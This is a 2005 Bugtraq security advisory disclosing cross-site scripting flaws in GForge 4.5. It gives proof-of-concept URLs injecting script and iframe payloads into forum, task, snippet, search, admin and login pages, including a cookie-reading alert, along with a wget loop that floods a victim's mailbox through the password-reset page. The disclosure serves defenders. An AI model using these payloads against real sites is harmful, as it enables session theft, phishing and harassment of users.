Cross Site Scripting vulnerabilities in GForge

To: bugtraq@xxxxxxxxxxxxxxxxx, Full Disclosure <full-disclosure@xxxxxxxxxxxxxxxx>, Secunia <vuln@xxxxxxxxxxx>, Security Tracker <bugs@xxxxxxxxxxxxxxxxxxx>, core@xxxxxxxxxx, tim@xxxxxxxxxx
Subject: Cross Site Scripting vulnerabilities in GForge
From: Joxean Koret <joxeankoret@xxxxxxxx>
Date: Wed, 27 Jul 2005 22:37:16 +0200
Domainkey-signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.es; h=Received:Subject:From:To:Content-Type:Date:Message-Id:Mime-Version:X-Mailer; b=0WkYyGV9C9npZgobeIE7ffX7ukJHRrLt8IgZiE6gNj2oa7CgBLEvSks5XwaepfCN1pOS5hvdwy6Q3LLzb14ANNeCfe8a/OcsjtSdKGHV6jt8pej560tpFwjwnnVSoUWnyL7nGHuPYtiC/Syugj8LNGqF4CjAjXQVhqwPMHs6MTI= ;
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

---------------------------------------------------------------------------
          Various Vulnerabilities in GForge 
---------------------------------------------------------------------------

Author: Jose Antonio Coret (Joxean Koret)
Date: 2005
Location: Basque Country

---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

GForge - 4.5 (Current)

GForge has tools to help your team collaborate, like message forums and 
mailing lists; tools to create and control access to Source Code
Management 
repositories like CVS and Subversion. GForge automatically creates a
repository 
and controls access to it depending on the role settings of the project.

Web : http://gforge.org/

---------------------------------------------------------------------------

A) Cross Site Scripting Vulnerabilities
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1.- In the Forum Module:

        http://[target]/forum/forum.php?forum_id=";><script>alert('hi')</script>
        http://[target]/forum/forum.php?group_id=";><script>alert('hi')</script>

(NOTE: The group_id parameter is ALWAYS vulnerable.)

2.- In the Task Module:


http://[target]/pm/task.php?func=detailtask&project_task_id=";><h1>hi!</h1>&group_id=1&group_project_id=3

3.- In the Snippets Module:

        http://[target]/snippet/detail.php?type=snippet&id=21";><iframe%
20src=http://www.playboy.com></iframe><font%20size="

4.- In the search engine:

To try it simply enter any valid XSS test such as "><h1>hi!!!</h1> in
the 
search field and press enter or try the following URL:

        http://[target]/search/?type_of_search=soft&words=%22%3E%3Ch1%3EHi%21%
3C%2Fh1%3E%3Ciframe+src%3Dhttp%3A%2F%2Fslashdot.org%3E%3C%2Fiframe%
3E&Search=Search

5.- In other modules:


http://[target]//frs/admin/qrs.php?group_id=";><script>alert(document.cookie)</script>
        http://[target]/notepad.php?form=parent;%0d%0a-->%0d%
0a</script><body><h1>hi!</h1></body></html><!--

NOTE: (rows, cols and wrap paremeter are also vulnerables).

6.- In the Login Form:

The login form is also vulnerable to XSS (Cross Site Scripting) attacks.
This may
be used to launch phising attacks by sending HTML e-mails (i.e.: saying
that you need 
to upgrade to the latest GForge version due to a security problem) and
putting in the 
e-mail an HTML link that points to an specially crafted url that inserts
an html form 
in the GForge login page and when the user press the login button,
he/she send the 
credentials to the attackers website.

POC. To "play" with this, simply go to the login page and insert in the
login field 
then following text: 

        "><iframe src=http://www.playboy.com></iframe><font size="

B) E-Mail Flood
~~~~~~~~~~~~~~~

The 'forgot your password?' feature allows a remote user to load a
certain URL to 
cause the service to send a validation e-mail to the specified user's
e-mail address. 
There is no limit to the number of messages sent over a period of time,
so a remote 
user can flood the target user's secondary e-mail address. E-Mail Flood,
E-Mail bomber.

The following is a "Proof Of Concept" of this vulnerability:

        [joxean@nemobox]$ while [ true ]; do
        >       wget http://[target]/account/lostpw.php?loginname=joxean
        > done

The "pending account" confirmation e-mail is also vulnerable so, a
mailicious user can
flood any e-mail box even if they are not GForge registered users.


The fix:
~~~~~~~~

There is no fix at the moment.


Workarounds:
~~~~~~~~~~~~

There are no workarounds except by using a method to automagically catch
the XSS
request such as WASP (available via CVS at
https://savannah.nongnu.org/wasp) or 
mod_security (available at http://www.modsecurity.org/) for Apache Web
Servers.


Timeline:
~~~~~~~~~

25-Apr-2005 Vendor contacted
25-Apr-2005 Initial Vendor response (without interest on fixing bugs)
25-Apr-2005 Response to vendor
04-Jun-2005 One XSS bug (not discovered by me) closed without a fix
23-Jun-2005 Vendor RE-contacted (No response)
27-Jul-2005 Advisory released

Disclaimer:
~~~~~~~~~~~

The information in this advisory and any of its demonstrations is
provided
"as is" without any warranty of any kind.

I am not liable for any direct or indirect damages caused as a result of
using the information or demonstrations provided in any part of this
advisory. 

---------------------------------------------------------------------------

Contact:
~~~~~~~~

        Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es

Attachment: signature.asc
Description: Esta parte del mensaje =?ISO-8859-1?Q?est=E1?= firmada digitalmente

Prev by Date: [OpenPKG-SA-2005.015] OpenPKG Security Advisory (spamassassin)
Next by Date: Re: Re : [Firefox Bug 302187] New: Shared section vulnerability when opening microsoft office document resulting in DoS
Previous by thread: [OpenPKG-SA-2005.015] OpenPKG Security Advisory (spamassassin)
Next by thread: Website Baker Project Multiple Vulnerabilities
Index(es):
- Date
- Thread